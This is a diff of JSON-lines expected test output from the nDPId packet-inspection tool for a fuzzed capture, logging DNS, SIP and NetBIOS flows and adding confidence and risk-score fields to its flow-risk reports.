-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470831402,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470831402,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00972{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":537,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":508,"pkt_l4_len":0,"ts_msec":1120470831403,"pkt":"ADBUADRWAODtAW69CABFAAHua7MAJXMAFYzAqAEC1PIhIxPEE8QB2oO4UkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMjY5MzY5tDUtNDc5ZTgzZjExOTIuMTY4LjEuMjtycG9ydA0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MTliMDYxNA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz4NCkNhbGwtSUQ6IDI5ODU4MTQ3LTQ2NWIwNzUyQDI5ODU4MDUxLTQ2NWIwN2IyDQpDb250YWN0OiBwZWwgPHNpcDozNTEwNDcyM0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9N2QzNjU1OGYzMTM2NzA1MT47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDMgUkVHSVNURVINCkNvbnRlbnQtTGVuZ3RoOiAwDQpNYXgtRm9yd2FyZHM6IDcwDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb2wgMi4wLjUxLjE2DQoNCg=="}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":537,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":474}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1120470831516,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470831516,"pkt":"ADBUADRWAODsAW69CABFAABIa7QAAIARS53AqAECwKgBAQoIADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470832512,"flow_last_seen":1120470832512,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470832512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1120470832512,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470832512,"pkt":"ADBUADRWAODtAW69CABFAABIa7UAAIARS5zAqAECwKgBAQryADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470832512,"flow_last_seen":1120470832512,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470832512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470832512,"flow_last_seen":1120470832512,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470832512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470834515,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1120470834515,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470834515,"pkt":"ADBUADRWAODtAW69CABFAABIa7YAAIARS5vAqAECwKgBAUbyADUANBq8DxcBAAABRwAAAAAABF9zaXAEX3VkcANzaXAJY3loZXJjaXR5AmRrAAAhAAE="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470834515,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyhercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470834515,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyhercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":1120470836517,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470836517,"pkt":"ADBUADRWAODtAW69CABFAABIa7cAAIARS5rAqAECwKgBAQryADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470840523,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470840523,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470840523,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470657808,"flow_last_seen":1120470666317,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1120470840523,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470840523,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470840523,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470840523,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470657808,"flow_last_seen":1120470666317,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1120470840523,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":3,"flow_last_seen":1120470840523,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470840523,"pkt":"ADBUADRWAODtAW69CABFAABIa7gAAIARS5nAqAECwKgBAQryADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848525,"flow_last_seen":1120470848525,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470848525,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1120470848525,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470848525,"pkt":"ADBUADRWAODtAW5iCABFAABEa7kAAIARS5zAqAECwKgBAQrzADUAMMmyWxkAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848525,"flow_last_seen":1120470848525,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470848525,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848525,"flow_last_seen":1120470848525,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470848525,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":2,"flow_last_seen":1120470848527,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470848527,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvMAR6wuWxmAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAMMAAcAMAAyeAQAAJxAACwlsb2NhbGhvc3QA"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470848527,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470848527,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1120470848643,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470848643,"pkt":"ADBUADRWAODtAW69CABFAABIW7sAAIARS5bAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00805{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":551,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":382,"pkt_l4_len":0,"ts_msec":1120470848686,"pkt":"ADBUADRWAODtAW69CAA\/AAFwa7wAAIARFgHAeQEC1PIhIxPEE8QBXMMEQUNLIHNpcDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KRnJvbTogImFyaWsiIDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTE3NWExZGQNbENhbGwtSUQ6IDI0NDg3MzkxLTQ0OWJmMmEwQDE5Mi4xNjguMS4yDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yOjUwNjA7YnJhbmNoPXo5aEc0YktucDI0NDY2NDAyLTQ1ZGM2MWQ1MTkyLjE2OC4xLjI7cnBvcnQNClRvOiA8c2lwOjAwOTcyMzkyODcwNDRAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTBMLTA0JXMALTE3MDFiOWEwLTEzYzkyYTY3Mg0KQ1NlcTogMSBBQ0sNCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="}
 00179{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":551,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048}
